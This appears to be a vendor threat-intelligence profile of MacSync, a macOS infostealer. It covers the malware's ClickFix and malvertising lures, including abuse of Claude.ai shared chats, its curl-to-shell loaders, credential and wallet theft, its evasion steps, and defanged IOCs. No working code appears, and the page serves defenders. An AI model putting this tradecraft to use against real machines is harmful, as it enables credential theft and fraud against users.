MacSync
MacSync is a macOS infostealer, also referred to in reporting as MacSync Stealer and tracked by some researchers as BarkBlitz. The malware is actively distributed through social-engineering campaigns rather than exploits, most prominently ClickFix-style lures that trick users into pasting malicious commands into Terminal, as well as SEO poisoning, poisoned Google Ads, fake troubleshooting pages, fake Zoom/Trezor Suite/Ledger installers, and abuse of legitimate platforms such as Claude.ai shared chats, Google Sites, Framer, Medium, Craft, and Squarespace. Reporting describes MacSync as an actively operated malware-as-a-service operation leased to other cybercriminals, with activity observed since at least November 2025 and continued use through 2026.
Across the cited reporting, MacSync is used to harvest browser credentials, cookies, active session tokens, and macOS Keychain contents. Higher-confidence reporting also states it targets cryptocurrency wallet data, including browser wallet extensions and desktop wallets, and can collect SSH keys, AWS credentials, Kubernetes configuration, Telegram Desktop session data, Apple Notes data, Safari cookies and history, shell history, and sensitive files from user directories. Multiple reports state that MacSync stages stolen data in temporary directories such as /tmp/sync<random digits>/, compresses it into archives such as /tmp/osalogging.zip, and exfiltrates it to attacker-controlled infrastructure, including via chunked HTTP PUT uploads to a /gate endpoint using API-key authentication.
MacSync commonly uses native macOS tooling for execution and evasion. Reported tradecraft includes curl-based shell loaders, in-memory execution through osascript, fake password prompts styled as System Preferences dialogs, local password validation with dscl, quarantine or extended-attribute removal with xattr, and persistence via LaunchAgents, LaunchDaemons, or disguised updater components. Some campaigns profile victims before full execution, collecting hostname, OS version, external IP, and keyboard locale, and include a CIS-region avoidance check that exits when Russian or other CIS keyboard settings are detected. Reporting also describes trojanization of cryptocurrency applications, especially Ledger Wallet and Ledger Live, by replacing application resources and re-signing them so seed phrases or transactions can be intercepted later.
Researchers linked MacSync to infrastructure and artifacts including the Apple Developer ID certificate for OKAN ATAKOL (Team ID GNJLS3UYZ4), which multiple reports say was used to sign MacSync samples to help bypass Gatekeeper. Reported MacSync-related infrastructure includes domains such as bluestonerepair[.]com, gatemaden[.]space, audio-drivers-zoom[.]us, mansfieldpediatrics[.]com, houstongaragedoorinstallers[.]com, and filegrowthlabs[.]com, as well as C2 IPs including 172.94.9[.]250 and 68.183.52.163. A shared API key, 5190ef1733183a0dc63fb623357f56d6, was reported across multiple MacSync samples and campaigns. Follow-on research also describes a mature MaaS management panel with customized lure builders, remote command execution, file theft, cookie restoration, affiliate access, and SOCKS5 proxy activation on infected Macs.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"Threat Details and IOCs Malware: Mac.c, MacSync, MacSync Stealer CVEs: CVE-2023-31290"
Techniques & procedures
26 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniquesAttackers are currently running a malvertising campaign that uses Google Ads and legitimate shared chats on Claude.ai to spread macOS infostealer malware.
"...MacSync... currently distributed via SEO poisoning campaigns."
Initial Access
1 techniqueMac users are encountering deceptive websites—often through Google Ads or malicious advertisements... During November 2025, Microsoft Defender Experts identified a WhatsApp platform abuse campaign... sends malicious attachments to all contacts using predefined messaging templates.
Execution
5 techniquesInitial commands leverage curl to fetch obfuscated payloads, which are piped directly into shell interpreters (bash/zsh), minimizing the disk footprint.
These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials... Suspicious AppleScript activity.
Since February 2026, one observed campaign variant uses curl to pull a loader shell from attacker infrastructure the moment the ClickFix command runs. That loader is a zsh script, a macOS default shell that decodes and decompresses an embedded payload using Base64 and Gzip before executing it in memory using eval.
That page then tells them to open Terminal and paste a command. Instead of installing useful software, the command quietly downloads and runs malware on the victim’s Mac.
Attackers exploit this trust by providing malicious command strings that mimic legitimate installation procedures.
Persistence
2 techniquesPrivilege Escalation
2 techniquesStealth
3 techniquesThe command being pasted downloads a shell script that is encoded in base64 from domains controlled by attackers.
The server delivers a uniquely obfuscated version of the payload for each request, a technique known as polymorphic delivery.
Credential Access
6 techniquesAWS credentials, SSH keys, Kubernetes configuration files, crypto seed phrases, and corporate SSO sessions all live in Keychain or browser credential stores on those machines — and AMOS, MacSync, and Shub Stealer are all purpose-built to harvest exactly that data.
In some variants, the payload is linked to MacSync-style infostealer behavior, aimed at harvesting browser credentials, cookies, and Keychain data.
Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data.
Microsoft recommends... custom detection rules covering abnormal Keychain access, browser credential store queries, and cloud credential file reads.
All three harvest the same types of data—browser credentials, saved passwords... CrystalPDF.exe... covertly hijacking Firefox and Chrome browsers to access sensitive files... including cookies, session data, and credential caches.
In some variants, the payload is linked to MacSync-style infostealer behavior, aimed at harvesting browser credentials, cookies, and Keychain data.
Discovery
2 techniquesIt also gathers the external IP address, hostname, operating system version, and keyboard locale, which it then transmits back to the attacker.
Collection
1 techniqueDetect transient creation of ZIP archives under /tmp or similar ephemeral directories, followed by outbound exfiltration attempts... Sensitive browser information compressed into ZIP file for exfiltration.
Command and Control
3 techniquesOne of the payloads is a Python script that establishes communication with a remote server... Communication to command and control server.
Inspect network egress for POST requests to newly registered or suspicious domains... Exfiltration through curl.
Since February 2026, one observed campaign variant uses curl to pull a loader shell from attacker infrastructure the moment the ClickFix command runs.
Exfiltration
1 techniquecollected sensitive information, and exfiltrated the data via Telegram... then send everything to attacker servers... Exfiltration through curl.
Other
1 techniqueIOCs tracked for this family
177 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
63 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A named macOS malware payload observed in ClickFix campaigns; the content lists it as part of the payload set used by multiple threat groups.
An infostealer targeting Mac users, associated here with theft of browser credentials, cookies, and Keychain data.
macOS stealer referenced as using the same ClickFix-style social engineering approach and AI-themed lures for infection.
A macOS stealer referenced as using the same ClickFix-style social engineering approach for infection.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.